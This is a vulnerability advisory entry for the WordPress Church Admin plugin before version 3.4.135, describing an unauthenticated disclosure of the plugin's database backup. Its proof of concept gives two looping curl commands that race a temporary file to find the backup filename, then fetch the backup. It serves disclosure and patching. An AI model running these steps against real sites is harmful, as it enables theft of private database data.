WordPress Plugin Vulnerabilities
Church Admin < 3.4.135 - Unauthenticated Plugin's Backup Disclosure
Description
The plugin does not have authorisation and CSRF in some of its action as well as requested files, allowing unauthenticated attackers to repeatedly request the "refresh-backup" action, and simultaneously keep requesting a publicly accessible temporary file generated by the plugin in order to disclose the final backup filename, which can then be fetched by the attacker to download the backup of the plugin's DB data
Proof of Concept
1. In one terminal, continuously fetch from http://127.0.0.1:8080/?action=refresh-backup: while true; do curl -s 'http://127.0.0.1:8080/?action=refresh-backup' >/dev/null; done 2. In a second terminal, continuously fetch from /wp-content/uploads/church-admin-cache/temp.sql while true; do curl -s http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/temp.sql | grep '\.sql\.gz'; done 3. After a while, the backup filename should be found by the curl | grep command (second terminal), once found, abort the command in terminal one first, then the one in the second terminal - use the last output of the second terminal as the filename (<md5-hash>.sql.gz). 4. Download the backup by accessing it via http://127.0.0.1:8080/wp-content/uploads/church-admin-cache/<extracted-md5-hash>.sql.gz
Affects Plugins
Fixed in version 3.4.135
References
Classification
Miscellaneous
Original Researcher
cydave
Submitter
cydave
Submitter website
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2022-03-07 (about 9 months ago)
Added
2022-03-07 (about 9 months ago)
Last Updated
2022-04-08 (about 8 months ago)